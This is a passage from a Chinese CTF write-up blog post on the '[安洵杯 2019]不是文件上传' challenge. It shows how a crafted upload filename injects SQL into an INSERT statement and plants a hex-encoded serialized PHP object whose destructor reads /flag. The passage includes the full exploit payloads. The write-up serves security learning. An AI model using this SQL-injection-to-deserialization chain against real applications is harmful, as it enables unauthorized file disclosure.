<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;INSERT INTO images (&quot;</span>.(<span class="title function_ invoke__">implode</span>(<span class="string">&quot;,&quot;</span>,<span class="variable">$sql_fields</span>)).<span class="string">&quot;) VALUES(&quot;</span>.(<span class="title function_ invoke__">implode</span>(<span class="string">&quot;,&quot;</span>,<span class="variable">$sql_val</span>)).<span class="string">&quot;)&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>这里的 <code>$sql_val</code> 数组包含了用户上传文件的相关信息，若攻击者能控制这些信息，就可能注入恶意 SQL 代码</p>
<p>我们正常上传一个图片的sql语句是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) </span><br><span class="line">VALUES (&#x27;title&#x27;,&#x27;16位md5截取的文件名&#x27;,&#x27;被限制类型的后缀&#x27;,&#x27;pic/xxxx.xxx&#x27;,&#x27;图片宽高&#x27;)</span><br></pre></td></tr></table></figure>
<p><code>title</code>,<code>filename</code>,<code>ext</code>,<code>path</code>,<code>attr</code>这些信息中只有title是我们能控制的</p>
<p>这时候构造title为<code>1','1','1','1',payload)#</code></p>
<p>sql语句就变成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) </span><br><span class="line">VALUES (&#x27;1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,payload)#&#x27;,&#x27;16位md5截取的文件名&#x27;,&#x27;被限制类型的后缀&#x27;,&#x27;pic/xxxx.xxx&#x27;,&#x27;图片宽高&#x27;)</span><br></pre></td></tr></table></figure>
<p><strong>因为在show.php中只会反序列化row[attr]的内容，而attr的内容是图片长和宽，是固定的，所以就用title的可控性把sql语句题解闭合，将attr变为我们可控的序列化语句</strong></p>
<p>show.php是include了helper.php的，而且helper.php中又有__destruct(用来触发view_files查看flag文件)</p>
<p>可以，开始解题</p>
<h2 id="解题"><a class="markdownIt-Anchor" href="#解题"></a> 解题</h2>
<h3 id="构造exp"><a class="markdownIt-Anchor" href="#构造exp"></a> 构造exp</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class helper &#123;</span><br><span class="line">    protected $ifview = True;</span><br><span class="line">    protected $config = &quot;/flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line">$a = new helper();</span><br><span class="line">echo serialize($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:6:&quot;helper&quot;:2:&#123;s:9:&quot; * ifview&quot;;b:1;s:9:&quot; * config&quot;;s:5:&quot;/flag&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>这里的属性值ifview和config都是protected类型的，所以需要将payload修改为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:6:&quot;helper&quot;:2:&#123;s:9:&quot;\0\0\0ifview&quot;;b:1;s:9:&quot;\0\0\0config&quot;;s:5:&quot;/flag&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>(以至于为什么要将修改为\0\0\0，是因为源码中在存取过程中对protected类型的属性进行了处理。)</p>
<h3 id="构造恶意文件名"><a class="markdownIt-Anchor" href="#构造恶意文件名"></a> 构造恶意文件名</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.jpg</span><br></pre></td></tr></table></figure>
<p>因为图片上传不能有双引号，所以将payload进行了16进制编码。</p>
<p>原来是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,&#x27;1&#x27;,O:6:&quot;helper&quot;:2:&#123;s:9:&quot;\0\0\0ifview&quot;;b:1;s:9:&quot;\0\0\0config&quot;;s:5:&quot;/flag&quot;;&#125;)#.jpg</span><br></pre></td></tr></table></figure>
<p>上传图片，抓包修改文件名为上述恶意代码</p>
<p>访问show.php造成反序列化，触发helper.php中的view_file，读处flag</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">php反序列化</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag">sql注入</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/background-2.jpg" data-sizes="auto" alt="[GoogleCTF2019 Quals]Bnv" class="lazyload">
          
        
        <a href="/2025/05/01/%5BGoogleCTF2019%20Quals%5DBnv/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            [GoogleCTF2019 Quals]Bnv
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        <img data-src="/../images/126839103p0master1200.jpg" data-sizes="auto" alt="[SUCTF 2018]annonymous" class="lazyload">
      
      <a href="/2025/04/30/%5BSUCTF%202018%5Dannonymous/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          [SUCTF 2018]annonymous
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2025
      <span class="footer-info-sep rotate"></span>
      FuB0Y
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        284k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        20:48
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text"> 代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text"> 解题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0exp"><span class="toc-number">2.1.</span> <span class="toc-text"> 构造exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6%E5%90%8D"><span class="toc-number">2.2.</span> <span class="toc-text"> 构造恶意文件名</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">186</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">4</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">179</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.0.6/dist/index.umd.js" integrity="sha384-vkGvf25gm1C1PbcoD5dNfc137HzNL&#x2F;hr1RKA5HniJOaawtvUmH5lTVFgFAruE9Ge" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "FuB0Y",
          title: "[安洵杯 2019]不是文件上传",
          url: "http://example.com/2025/05/01/[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]%E4%B8%8D%E6%98%AF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/",
          excerpt: "",
          description: "",
          stripContent: " 这个题过于cs了 一直以为是个文件上传的题，但怎么也注入不了，看题解题解说这是一个反序列化配合sql题…八竿子打不着 题目给了源码  代码审计 upload.php 12345678910111213141516171819&amp;lt;?phpinclude(&amp;quot;./helper.php&amp;quot;);class upload extends helper &amp;#123; public function upload_base()&amp;#123;  $this-&amp;gt;upload(); &amp;#1",
          date: "Thu May 01 2025 11:49:03 GMT+0800",
          updated: "Mon May 05 2025 22:29:48 GMT+0800",
          cover: "/../images/126839103p0master1200.jpg",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.js" integrity="sha384-7zkQWkzuo3B5mTepMUcHkMB5jZaolc2xDwL6VFqjFALcbeS9Ggm&#x2F;Yr2r3Dy4lfFg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/contrib/auto-render.min.js" integrity="sha384-43gviWU0YVjaDtb&#x2F;GhzOouOXtZMP&#x2F;7XUzwPTstBeZFe&#x2F;+rCMvRwr4yROQP43s0Xk" crossorigin="anonymous" defer onload="renderMathInElement(document.body, {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  





  </body>
  </html>

